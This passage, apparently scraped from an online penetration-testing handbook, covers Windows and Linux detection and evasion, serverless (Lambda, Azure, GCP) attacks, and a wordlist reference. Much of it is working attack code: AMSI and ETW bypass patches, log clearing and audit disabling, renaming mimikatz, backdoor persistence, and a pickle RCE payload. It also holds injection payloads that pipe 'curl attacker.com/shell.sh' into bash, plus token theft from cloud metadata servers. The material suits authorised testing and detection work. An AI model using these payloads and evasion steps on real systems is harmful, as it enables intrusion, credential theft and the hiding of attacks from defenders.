suspect_file.exe yara -s rules.yar /path/to/scan/ # Memory scanning with YARA volatility -f memory.dmp yarascan -Y "rule_file.yar" Copy # Key log sources: # - Security.evtx (logons, process creation, object access) # - System.evtx (service installation, driver loading) # - PowerShell logs (script block, transcription) # - Sysmon (detailed process/network logging) # Critical Event IDs: # 4624 - Successful logon # 4625 - Failed logon # 4648 - Explicit credential use # 4672 - Special privileges assigned # 4688 - Process creation # 4689 - Process termination # 4697 - Service installed # 4698 - Scheduled task created # 4720 - User created # 4728/4732 - User added to group # 5140 - Network share accessed # 5145 - Detailed file share access # 7045 - Service installed (System log) # Sysmon Event IDs: # 1 - Process creation # 3 - Network connection # 7 - Image loaded (DLL) # 8 - CreateRemoteThread # 10 - Process access # 11 - File creation # 12/13/14 - Registry events # 22 - DNS query # Query logs wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text /c:5 # PowerShell query Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} -MaxEvents 10 Copy # Key log files: # /var/log/auth.log - Authentication events # /var/log/syslog - System events # /var/log/secure - Security events (RHEL) # /var/log/audit/audit.log - Auditd events # ~/.bash_history - Command history # /var/log/apache2/access.log - Web server # Auditd rules for detection # /etc/audit/rules.d/audit.rules # Monitor file access -w /etc/passwd -p wa -k passwd_changes -w /etc/shadow -p wa -k shadow_changes # Monitor command execution -a always,exit -F arch=b64 -S execve -k commands # Monitor network connections -a always,exit -F arch=b64 -S connect -k network # Search audit logs ausearch -k passwd_changes ausearch -m execve -ui 0 # Commands run as root aureport --summary Copy # Firewall logs # - PF/iptables logs # - Palo Alto, Fortinet, etc. # DNS logs # - Passive DNS # - DNS query/response logging # Proxy logs # - HTTP/HTTPS requests # - User agent strings # - Destination URLs # IDS/IPS logs # - Snort/Suricata alerts # - Network anomalies # Netflow/sFlow # - Connection metadata # - Traffic patterns # Key indicators: # - Unusual ports/protocols # - Beaconing behavior (regular intervals) # - DNS tunneling (long subdomains) # - Large data transfers # - Connections to rare destinations Copy # Evasion principle: Look normal # Use legitimate tools # - PowerShell instead of custom malware # - Built-in Windows commands # - Signed Microsoft binaries (LOLBins) # Common LOLBins that avoid detection: # - certutil.exe (download files) # - mshta.exe (execute HTA) # - regsvr32.exe (execute COM scriptlets) # - rundll32.exe (execute DLLs) # - wmic.exe (remote execution) # - msiexec.exe (install MSI) # Time your activities # - Work during business hours # - Match normal user patterns # - Avoid weekends/holidays # Use expected protocols # - HTTP/HTTPS for C2 # - DNS for exfil (common traffic) # - Blend with cloud services (O365, AWS) Copy # Clear Windows event logs (noisy, often detected) wevtutil cl Security wevtutil cl System wevtutil cl Application # More subtle: Delete specific events # Requires Windows Event Log service manipulation # Tools: Invoke-Phant0m, danderspritz eventlogedit # Disable logging temporarily auditpol /set /category:* /success:disable /failure:disable # Timestomping timestomp malware.exe -m "01/01/2020 12:00:00" # Linux log tampering # Clear history history -c unset HISTFILE export HISTSIZE=0 # Modify auth.log sed -i '/attacker_ip/d' /var/log/auth.log # Stop logging systemctl stop rsyslog Copy # Understand what triggers detection # Encoding/obfuscation # Base64, XOR, custom encoding # Break up known-bad strings $a = "mimi"; $b = "katz"; $c = $a + $b # Command line evasion # Environment variable substitution cmd /c "set x=whoami && call %x%" # Character insertion w^h^o^a^m^i # Case variation (in some contexts) WhOaMi # Process name masquerading # Rename binary to legitimate name copy mimikatz.exe svchost.exe # Parent process spoofing # Make malicious process appear to have legitimate parent # Avoid process creation entirely # - Fileless malware # - Living off the land # - In-memory execution Copy # Domain fronting (largely blocked now) # Use legitimate domain's infrastructure curl -H "Host: c2.attacker.com" https://legitimate.cloudfront.net # Encrypted channels # TLS for C2 communications # Custom protocols over 443 # DNS tunneling # iodine, dnscat2 # Keep queries short and infrequent # Slow beaconing # Random intervals (jitter) # Long sleep times # Protocol mimicry # Make C2 look like legitimate traffic # Match expected user agents, headers # Proxy/redirector chains # Multiple hops between target and C2 # Use cloud infrastructure (AWS, Azure) Copy # Atomic Red Team - tests mapped to MITRE ATT&CK # https://github.com/redcanaryco/atomic-red-team # Install Install-Module -Name invoke-atomicredteam -Scope CurrentUser Import-Module invoke-atomicredteam # List available tests Invoke-AtomicTest T1003 -ShowDetailsBrief # Run test Invoke-AtomicTest T1003.001 -GetPrereqs # Install prerequisites Invoke-AtomicTest T1003.001 # Execute test Invoke-AtomicTest T1003.001 -Cleanup # Clean up # Key technique categories: # T1003 - Credential Dumping # T1059 - Command and Script Interpreter # T1053 - Scheduled Task/Job # T1047 - Windows Management Instrumentation # T1021 - Remote Services # T1105 - Ingress Tool Transfer Copy # Workflow for testing detections: # 1. Identify technique to test # Select MITRE ATT&CK technique # 2. Review existing detections # Check Sigma rules, SIEM queries # 3. Execute atomic test Invoke-AtomicTest T1003.001 # 4. Check if detection fired # Review SIEM alerts # Check EDR console # 5. If not detected: # - Tune detection rules # - Add new detection # - Enable additional logging # 6. Re-test and validate # Automated testing script $techniques = @('T1003.001', 'T1059.001', 'T1053.005') foreach ($t in $techniques) { Write-Host "Testing $t" Invoke-AtomicTest $t -GetPrereqs Invoke-AtomicTest $t Start-Sleep -Seconds 60 # Wait for logs # Check SIEM for alerts Invoke-AtomicTest $t -Cleanup } Copy # AMSI logs PowerShell to security products # Bypass to avoid script-based detection # Patch amsi.dll in memory $a = [Ref].Assembly.GetTypes() ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}} $d = $c.GetFields('NonPublic,Static') ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}} $g = $f.GetValue($null) [IntPtr]$ptr = $g [Int32[]]$buf = @(0) [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) # After bypass, malicious PowerShell won't be flagged Copy # Event Tracing for Windows logs PowerShell, .NET, etc. # Patching prevents logging # Patch EtwEventWrite $ntdll = [System.Runtime.InteropServices.Marshal]::GetHINSTANCE( [System.Reflection.Assembly]::LoadWithPartialName("ntdll").GetModules()[0] ) $addr = [System.Runtime.InteropServices.NativeMethods]::GetProcAddress($ntdll, "EtwEventWrite") [System.Runtime.InteropServices.Marshal]::WriteByte($addr, 0xC3) # ret Copy # Disable PowerShell Script Block Logging # Via Group Policy bypass $settings = [Ref].Assembly.GetType('System.Management.Automation.Utils').GetField( 'cachedGroupPolicySettings', 'NonPublic,Static' ) $cache = $settings.GetValue($null) $cache['ScriptBlockLogging'] = @{} $cache['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 $cache['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0 Copy # Sysmon provides detailed Windows logging # Evasion requires understanding Sysmon config # Check if Sysmon is running Get-Process sysmon* -ErrorAction SilentlyContinue Get-Service sysmon* -ErrorAction SilentlyContinue # Sysmon config is usually at: # C:\Windows\SysmonConfig.xml (named differently) # Find Sysmon config fltMC.exe | findstr /i sysmon reg query "HKLM\SYSTEM\CurrentControlSet\Services\SysmonDrv" /v "Config" # Dump Sysmon config # https://github.com/nshalabi/SysmonTools SysmonShell.exe -c # Evasion techniques: # - Use excluded paths from config # - Rename processes to excluded names # - Use techniques not covered by rules # - Unload Sysmon driver (detected) Copy # Detection/Testing: # - Atomic Red Team: https://github.com/redcanaryco/atomic-red-team # - MITRE Caldera: https://github.com/mitre/caldera # - Infection Monkey: https://github.com/guardicore/monkey # - Stratus Red Team (cloud): https://github.com/DataDog/stratus-red-team # Rule Development: # - Sigma: https://github.com/SigmaHQ/sigma # - YARA: https://github.com/VirusTotal/yara # - Uncoder.io (rule conversion) # Log Analysis: # - Chainsaw: https://github.com/WithSecureLabs/chainsaw # - Hayabusa: https://github.com/Yamato-Security/hayabusa # - DeepBlueCLI: https://github.com/sans-blue-team/DeepBlueCLI # Threat Intelligence: # - MITRE ATT&CK: https://attack.mitre.org/ # - Threat Hunter Playbook: https://threathunterplaybook.com/ --- # Serverless Security | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud/serverless.md) . [](https://www.pentest-book.com/enumeration/cloud/serverless#overview) Overview ------------------------------------------------------------------------------------ Serverless computing (Functions as a Service) introduces unique security challenges. This section covers exploitation techniques for AWS Lambda, Azure Functions, and Google Cloud Functions. [](https://www.pentest-book.com/enumeration/cloud/serverless#aws-lambda) AWS Lambda ---------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/serverless#enumeration) Enumeration Copy # List Lambda functions aws lambda list-functions --region us-east-1 # Get function details aws lambda get-function --function-name # Get function configuration (env vars may contain secrets) aws lambda get-function-configuration --function-name # List event source mappings aws lambda list-event-source-mappings # Get function policy aws lambda get-policy --function-name # List layers (shared code/dependencies) aws lambda list-layers aws lambda get-layer-version --layer-name --version-number ### [](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-environment-variables) Lambda Environment Variables ### [](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-iam-role-abuse) Lambda IAM Role Abuse ### [](https://www.pentest-book.com/enumeration/cloud/serverless#event-injection) Event Injection ### [](https://www.pentest-book.com/enumeration/cloud/serverless#cold-start-information-disclosure) Cold Start Information Disclosure ### [](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-layer-attacks) Lambda Layer Attacks [](https://www.pentest-book.com/enumeration/cloud/serverless#azure-functions) Azure Functions -------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/serverless#enumeration-1) Enumeration ### [](https://www.pentest-book.com/enumeration/cloud/serverless#managed-identity-exploitation) Managed Identity Exploitation ### [](https://www.pentest-book.com/enumeration/cloud/serverless#kudu-console-access) Kudu Console Access ### [](https://www.pentest-book.com/enumeration/cloud/serverless#http-trigger-vulnerabilities) HTTP Trigger Vulnerabilities [](https://www.pentest-book.com/enumeration/cloud/serverless#google-cloud-functions) Google Cloud Functions ---------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/serverless#enumeration-2) Enumeration ### [](https://www.pentest-book.com/enumeration/cloud/serverless#service-account-abuse) Service Account Abuse ### [](https://www.pentest-book.com/enumeration/cloud/serverless#pub-sub-event-injection) Pub/Sub Event Injection [](https://www.pentest-book.com/enumeration/cloud/serverless#common-vulnerabilities) Common Vulnerabilities ---------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/serverless#insecure-deserialization) Insecure Deserialization ### [](https://www.pentest-book.com/enumeration/cloud/serverless#ssrf-via-functions) SSRF via Functions ### [](https://www.pentest-book.com/enumeration/cloud/serverless#prototype-pollution-node.js) Prototype Pollution (Node.js) ### [](https://www.pentest-book.com/enumeration/cloud/serverless#command-injection) Command Injection ### [](https://www.pentest-book.com/enumeration/cloud/serverless#dependency-vulnerabilities) Dependency Vulnerabilities [](https://www.pentest-book.com/enumeration/cloud/serverless#persistence-techniques) Persistence Techniques ---------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-layers-for-persistence) Lambda Layers for Persistence ### [](https://www.pentest-book.com/enumeration/cloud/serverless#event-source-persistence) Event Source Persistence ### [](https://www.pentest-book.com/enumeration/cloud/serverless#function-code-modification) Function Code Modification [](https://www.pentest-book.com/enumeration/cloud/serverless#detection-evasion) Detection Evasion ------------------------------------------------------------------------------------------------------ [](https://www.pentest-book.com/enumeration/cloud/serverless#tools) Tools ------------------------------------------------------------------------------ [](https://www.pentest-book.com/enumeration/cloud/serverless#resources) Resources -------------------------------------------------------------------------------------- * [Serverless Security Top 10](https://github.com/puresec/sas-top-10) * [AWS Lambda Security Best Practices](https://docs.aws.amazon.com/lambda/latest/dg/lambda-security.html) * [Azure Functions Security](https://docs.microsoft.com/en-us/azure/azure-functions/security-concepts) * [GCP Cloud Functions Security](https://cloud.google.com/functions/docs/securing) [PreviousDocker && Kubernetes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes) [NextCDN - Comain Fronting](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting) Last updated 5 months ago Was this helpful? * [Overview](https://www.pentest-book.com/enumeration/cloud/serverless#overview) * [AWS Lambda](https://www.pentest-book.com/enumeration/cloud/serverless#aws-lambda) * [Enumeration](https://www.pentest-book.com/enumeration/cloud/serverless#enumeration) * [Lambda Environment Variables](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-environment-variables) * [Lambda IAM Role Abuse](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-iam-role-abuse) * [Event Injection](https://www.pentest-book.com/enumeration/cloud/serverless#event-injection) * [Cold Start Information Disclosure](https://www.pentest-book.com/enumeration/cloud/serverless#cold-start-information-disclosure) * [Lambda Layer Attacks](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-layer-attacks) * [Azure Functions](https://www.pentest-book.com/enumeration/cloud/serverless#azure-functions) * [Enumeration](https://www.pentest-book.com/enumeration/cloud/serverless#enumeration-1) * [Managed Identity Exploitation](https://www.pentest-book.com/enumeration/cloud/serverless#managed-identity-exploitation) * [Kudu Console Access](https://www.pentest-book.com/enumeration/cloud/serverless#kudu-console-access) * [HTTP Trigger Vulnerabilities](https://www.pentest-book.com/enumeration/cloud/serverless#http-trigger-vulnerabilities) * [Google Cloud Functions](https://www.pentest-book.com/enumeration/cloud/serverless#google-cloud-functions) * [Enumeration](https://www.pentest-book.com/enumeration/cloud/serverless#enumeration-2) * [Service Account Abuse](https://www.pentest-book.com/enumeration/cloud/serverless#service-account-abuse) * [Pub/Sub Event Injection](https://www.pentest-book.com/enumeration/cloud/serverless#pub-sub-event-injection) * [Common Vulnerabilities](https://www.pentest-book.com/enumeration/cloud/serverless#common-vulnerabilities) * [Insecure Deserialization](https://www.pentest-book.com/enumeration/cloud/serverless#insecure-deserialization) * [SSRF via Functions](https://www.pentest-book.com/enumeration/cloud/serverless#ssrf-via-functions) * [Prototype Pollution (Node.js)](https://www.pentest-book.com/enumeration/cloud/serverless#prototype-pollution-node.js) * [Command Injection](https://www.pentest-book.com/enumeration/cloud/serverless#command-injection) * [Dependency Vulnerabilities](https://www.pentest-book.com/enumeration/cloud/serverless#dependency-vulnerabilities) * [Persistence Techniques](https://www.pentest-book.com/enumeration/cloud/serverless#persistence-techniques) * [Lambda Layers for Persistence](https://www.pentest-book.com/enumeration/cloud/serverless#lambda-layers-for-persistence) * [Event Source Persistence](https://www.pentest-book.com/enumeration/cloud/serverless#event-source-persistence) * [Function Code Modification](https://www.pentest-book.com/enumeration/cloud/serverless#function-code-modification) * [Detection Evasion](https://www.pentest-book.com/enumeration/cloud/serverless#detection-evasion) * [Tools](https://www.pentest-book.com/enumeration/cloud/serverless#tools) * [Resources](https://www.pentest-book.com/enumeration/cloud/serverless#resources) Was this helpful? Copy # Environment variables often contain: # - Database connection strings # - API keys # - AWS credentials (though IAM roles are preferred) # - Encryption keys # Extract from compromised function aws lambda get-function-configuration --function-name --query 'Environment.Variables' # Common sensitive variable names # DB_PASSWORD, API_KEY, SECRET_KEY, AWS_ACCESS_KEY_ID, JWT_SECRET, ENCRYPTION_KEY Copy # Lambda functions have IAM roles attached # If overly permissive, can be abused # Get the execution role aws lambda get-function --function-name --query 'Configuration.Role' # Check what the role can do aws iam get-role-policy --role-name --policy-name aws iam list-attached-role-policies --role-name # If you can invoke the function, use it to: # - Access S3 buckets # - Query DynamoDB # - Call other AWS services # - Pivot to other resources Copy # Lambda can be triggered by various events # Injecting malicious payloads into event sources # API Gateway (HTTP trigger) curl -X POST https://api.execute-api.region.amazonaws.com/prod/function \ -d '{"__proto__": {"admin": true}}' # S3 trigger - upload malicious file # Filename with command injection aws s3 cp malicious.txt "s3://bucket/; curl attacker.com/shell.sh | bash #.txt" # SNS/SQS - inject malicious message aws sns publish --topic-arn arn:aws:sns:region:account:topic \ --message '{"command": "$(curl attacker.com/shell.sh | bash)"}' # CloudWatch Events - if you can create rules aws events put-rule --name "backdoor" --schedule-expression "rate(5 minutes)" Copy # Lambda containers are reused # Previous invocation data might persist in /tmp # In malicious function code: import os # List /tmp contents print(os.listdir('/tmp')) # Read previous files for f in os.listdir('/tmp'): print(open(f'/tmp/{f}').read()) Copy # Layers are shared code across functions # If you can modify a layer, you compromise all functions using it # List layers a function uses aws lambda get-function --function-name --query 'Configuration.Layers' # If you have lambda:PublishLayerVersion # Create malicious layer with backdoored dependencies # Dependency confusion in layers # If function imports from layer, create malicious package Copy # List Function Apps az functionapp list --output table # Get function app details az functionapp show --name --resource-group # List functions in app az functionapp function list --name --resource-group # Get app settings (environment variables) az functionapp config appsettings list --name --resource-group # Get connection strings az functionapp config connection-string list --name --resource-group # Get function keys az functionapp function keys list --name --resource-group --function-name Copy # From inside compromised function, get tokens curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \ "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://management.azure.com/" # Use token for Azure management az login --identity az resource list # Access Key Vault curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \ "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://vault.azure.net/" Copy # Kudu provides debug console for Azure App Service/Functions # https://.scm.azurewebsites.net # If you have deployment credentials: # - Browse file system # - Execute commands via Debug Console # - Download function source code # - View environment variables # Download entire site curl -u 'username:password' https://.scm.azurewebsites.net/api/zip/site/wwwroot/ -o site.zip Copy # Check for unauthenticated triggers curl https://.azurewebsites.net/api/ # Authorization levels: # - anonymous: No key required # - function: Function-specific key # - admin: Master key only # If you find function key, use it: curl "https://.azurewebsites.net/api/?code=" Copy # List functions gcloud functions list # Describe function gcloud functions describe --region # Get IAM policy gcloud functions get-iam-policy --region # View source (if you have access) gcloud functions describe --format='value(sourceArchiveUrl)' # List environment variables gcloud functions describe --format='value(environmentVariables)' Copy # GCF uses service accounts # From inside function, access metadata server curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" # Use token TOKEN=$(curl -s -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | jq -r '.access_token') curl -H "Authorization: Bearer $TOKEN" \ "https://storage.googleapis.com/storage/v1/b?project=" Copy # If function is triggered by Pub/Sub # Inject malicious messages gcloud pubsub topics publish --message '{"payload": "malicious"}' # If you control the publisher, inject arbitrary data Copy # Lambda/Functions often deserialize input # Python pickle, Java serialization, Node.js # Python pickle RCE import pickle import base64 class Exploit: def __reduce__(self): import os return (os.system, ('curl attacker.com/shell.sh | bash',)) payload = base64.b64encode(pickle.dumps(Exploit())).decode() # Send as input to vulnerable function Copy # Functions often make HTTP requests # Use to access internal services # AWS metadata {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"} # Azure metadata {"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"} # GCP metadata {"url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"} # Internal services {"url": "http://internal-api.local/admin"} Copy // Many serverless functions use Node.js // Prototype pollution can lead to RCE // Malicious input { "__proto__": { "shell": "/bin/bash", "NODE_OPTIONS": "--require /proc/self/environ" } } // Or { "constructor": { "prototype": { "env": {"AAAA": "require('child_process').exec('curl attacker.com')"} } } } Copy # Functions often execute system commands # Inject via input parameters # Common injection points: # - Filename parameters # - URL parameters # - User-supplied commands # Examples {"filename": "file.txt; curl attacker.com/shell.sh | bash"} {"command": "ls -la $(curl attacker.com/shell.sh | bash)"} {"url": "http://example.com`id`"} Copy # Serverless functions use third-party dependencies # Vulnerable dependencies = vulnerable function # Check for known vulnerabilities # Node.js npm audit snyk test # Python pip-audit safety check # Look for outdated runtime versions # Lambda supports multiple Python/Node versions # Older versions may have known vulnerabilities Copy # Create malicious layer # Intercept function calls or add backdoor # Create layer with backdoored dependency mkdir -p python/lib/python3.9/site-packages/ # Add malicious code to a common dependency zip -r layer.zip python/ aws lambda publish-layer-version \ --layer-name "requests-layer" \ --zip-file fileb://layer.zip \ --compatible-runtimes python3.9 Copy # Create persistent triggers # AWS - CloudWatch Events aws events put-rule --name "backdoor" \ --schedule-expression "rate(1 hour)" aws events put-targets --rule "backdoor" \ --targets "Id"="1","Arn"="arn:aws:lambda:region:account:function:backdoor" # Azure - Timer trigger # Deploy function with timer trigger # GCP - Cloud Scheduler gcloud scheduler jobs create http backdoor \ --schedule="0 * * * *" \ --uri="https://region-project.cloudfunctions.net/backdoor" Copy # Modify function code to include backdoor # AWS aws lambda update-function-code \ --function-name \ --zip-file fileb://backdoored.zip # Azure az functionapp deployment source config-zip \ --name \ --resource-group \ --src backdoored.zip # GCP gcloud functions deploy \ --source=./backdoored-code Copy # Minimize logging # AWS - Don't use console.log/print in malicious code # Azure - Avoid Application Insights triggers # GCP - Don't write to stdout for sensitive operations # Use legitimate-looking function names # "data-processor", "auth-handler", "log-aggregator" # Blend with normal traffic patterns # Don't make unusual API calls # Match expected execution times # Clean up /tmp after exploitation rm -rf /tmp/* Copy # Serverless Security Scanner # https://github.com/puresec/serverless-security serverless-security scan # SLS-Dev-Tools # https://github.com/Theodo-UK/sls-dev-tools sls-dev-tools # Prowler (AWS) prowler -c lambda # ScoutSuite (multi-cloud) scout aws --services lambda scout azure --services functionapps scout gcp --services cloudfunctions # SCAR - Serverless security scanner # https://github.com/puresec/scar --- # Wordlist Reference | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/wordlist-reference.md) . Quick reference guide to essential wordlists for penetration testing. [](https://www.pentest-book.com/others/wordlist-reference#primary-resources) Primary Resources --------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/wordlist-reference#seclists) SecLists The most comprehensive collection of security testing wordlists. Copy # Installation git clone https://github.com/danielmiessler/SecLists.git # Or via package manager apt install seclists **Key Paths:** Use Case Path Web directories `Discovery/Web-Content/raft-large-directories.txt` Web files `Discovery/Web-Content/raft-large-files.txt` Common passwords `Passwords/Common-Credentials/10-million-password-list-top-1000000.txt` Default credentials `Passwords/Default-Credentials/` Usernames `Usernames/Names/names.txt` Subdomains `Discovery/DNS/subdomains-top1million-110000.txt` Parameters `Discovery/Web-Content/burp-parameter-names.txt` API paths `Discovery/Web-Content/api/api-endpoints.txt` SQL injection `Fuzzing/SQLi/` XSS `Fuzzing/XSS/` LFI `Fuzzing/LFI/` ### [](https://www.pentest-book.com/others/wordlist-reference#assetnote-wordlists) Assetnote Wordlists High-quality, constantly updated wordlists from bug bounty research. **Key Lists:** List Use Case `httparchive_directories_1m.txt` Directories from real websites `httparchive_parameters_top_1m.txt` Parameters from real traffic `httparchive_subdomains_1m.txt` Subdomains from certificate transparency `technologies/` Technology-specific wordlists ### [](https://www.pentest-book.com/others/wordlist-reference#n0kovo-subdomains) n0kovo Subdomains Curated subdomain wordlist with high discovery rate. [](https://www.pentest-book.com/others/wordlist-reference#by-use-case) By Use Case --------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/wordlist-reference#directory-file-discovery) Directory/File Discovery ### [](https://www.pentest-book.com/others/wordlist-reference#subdomain-enumeration) Subdomain Enumeration ### [](https://www.pentest-book.com/others/wordlist-reference#password-attacks) Password Attacks ### [](https://www.pentest-book.com/others/wordlist-reference#api-testing) API Testing ### [](https://www.pentest-book.com/others/wordlist-reference#parameter-discovery) Parameter Discovery ### [](https://www.pentest-book.com/others/wordlist-reference#fuzzing-injection) Fuzzing/Injection [](https://www.pentest-book.com/others/wordlist-reference#custom-wordlist-generation) Custom Wordlist Generation --------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/wordlist-reference#cewl-website-crawler) CeWL (Website Crawler) ### [](https://www.pentest-book.com/others/wordlist-reference#username-generation) Username Generation ### [](https://www.pentest-book.com/others/wordlist-reference#password-mutations) Password Mutations ### [](https://www.pentest-book.com/others/wordlist-reference#wordlist-manipulation) Wordlist Manipulation [](https://www.pentest-book.com/others/wordlist-reference#dns-resolvers) DNS Resolvers ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/wordlist-reference#quick-reference-table) Quick Reference Table ----------------------------------------------------------------------------------------------------------- Task Wordlist Size Quick dir scan common.txt 4.7K Standard dir scan raft-medium-directories.txt 30K Thorough dir scan directory-list-2.3-big.txt 1.2M Quick subdomain subdomains-top1million-5000.txt 5K Standard subdomain subdomains-top1million-20000.txt 20K Password spray 10k-most-common.txt 10K Password crack rockyou.txt 14M Parameter fuzz burp-parameter-names.txt 6K XSS fuzz XSS-Jhaddix.txt 8K SQLi fuzz Generic-SQLi.txt 267 LFI fuzz LFI-Jhaddix.txt 929 [](https://www.pentest-book.com/others/wordlist-reference#resources) Resources ----------------------------------------------------------------------------------- * [SecLists](https://github.com/danielmiessler/SecLists) * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) * [Assetnote Wordlists](https://wordlists.assetnote.io/) * [fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [n0kovo\_subdomains](https://github.com/n0kovo/n0kovo_subdomains) * [OneListForAll](https://github.com/six2dez/OneListForAll) [PreviousAttack Index](https://www.pentest-book.com/others/attack-index) [NextLearning Path](https://www.pentest-book.com/others/learning-path) Last updated 5 months ago Was this helpful? * [Primary Resources](https://www.pentest-book.com/others/wordlist-reference#primary-resources) * [SecLists](https://www.pentest-book.com/others/wordlist-reference#seclists) * [Assetnote Wordlists](https://www.pentest-book.com/others/wordlist-reference#assetnote-wordlists) * [n0kovo Subdomains](https://www.pentest-book.com/others/wordlist-reference#n0kovo-subdomains) * [By Use Case](https://www.pentest-book.com/others/wordlist-reference#by-use-case) * [Directory/File Discovery](https://www.pentest-book.com/others/wordlist-reference#directory-file-discovery) * [Subdomain Enumeration](https://www.pentest-book.com/others/wordlist-reference#subdomain-enumeration) * [Password Attacks](https://www.pentest-book.com/others/wordlist-reference#password-attacks) * [API Testing](https://www.pentest-book.com/others/wordlist-reference#api-testing) * [Parameter Discovery](https://www.pentest-book.com/others/wordlist-reference#parameter-discovery) * [Fuzzing/Injection](https://www.pentest-book.com/others/wordlist-reference#fuzzing-injection) * [Custom Wordlist Generation](https://www.pentest-book.com/others/wordlist-reference#custom-wordlist-generation) * [CeWL (Website Crawler)](https://www.pentest-book.com/others/wordlist-reference#cewl-website-crawler) * [Username Generation](https://www.pentest-book.com/others/wordlist-reference#username-generation) * [Password Mutations](https://www.pentest-book.com/others/wordlist-reference#password-mutations) * [Wordlist Manipulation](https://www.pentest-book.com/others/wordlist-reference#wordlist-manipulation) * [DNS Resolvers](https://www.pentest-book.com/others/wordlist-reference#dns-resolvers) * [Quick Reference Table](https://www.pentest-book.com/others/wordlist-reference#quick-reference-table) * [Resources](https://www.pentest-book.com/others/wordlist-reference#resources) Was this helpful? Copy # Download https://wordlists.assetnote.io/ Copy git clone https://github.com/n0kovo/n0kovo_subdomains.git Copy # Quick scan (fast) /usr/share/seclists/Discovery/Web-Content/common.txt # 4,700 entries # Standard scan /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # 30,000 /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt # 17,000 # Thorough scan (slower) /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt # 62,000 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt # 1,273,000 # Technology-specific /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.txt /usr/share/seclists/Discovery/Web-Content/CMS/drupal.txt /usr/share/seclists/Discovery/Web-Content/apache.txt /usr/share/seclists/Discovery/Web-Content/nginx.txt /usr/share/seclists/Discovery/Web-Content/IIS.txt Copy # Quick scan /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # Standard /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt # Thorough /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt # Alternative: n0kovo (high quality) n0kovo_subdomains/n0kovo_subdomains_huge.txt # 3,000,000+ Copy # Top passwords (quick) /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt # Larger list /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt # rockyou (classic) /usr/share/wordlists/rockyou.txt # 14 million # Service-specific /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt Copy # API endpoints /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt /usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt # API documentation paths /usr/share/seclists/Discovery/Web-Content/swagger.txt # GraphQL /usr/share/seclists/Discovery/Web-Content/graphql.txt Copy # GET/POST parameters /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Larger list from Assetnote httparchive_parameters_top_1m.txt Copy # SQL Injection /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt /usr/share/seclists/Fuzzing/SQLi/Generic-BlindSQLi.fuzzdb.txt # XSS /usr/share/seclists/Fuzzing/XSS/XSS-Bypass-Strings-BruteLogic.txt /usr/share/seclists/Fuzzing/XSS/XSS-Jhaddix.txt # Comprehensive # LFI/Path Traversal /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt # Command Injection /usr/share/seclists/Fuzzing/command-injection-commix.txt # SSTI /usr/share/seclists/Fuzzing/template-engines-special-vars.txt Copy # Extract words from target website cewl https://target.com -d 2 -m 5 -w custom_wordlist.txt # Include email addresses cewl https://target.com -e -w wordlist.txt # With authentication cewl https://target.com --auth_type basic --auth_user admin --auth_pass pass Copy # From first/last names # Tools: username-anarchy, namemash # username-anarchy ./username-anarchy --input-file names.txt --select-format 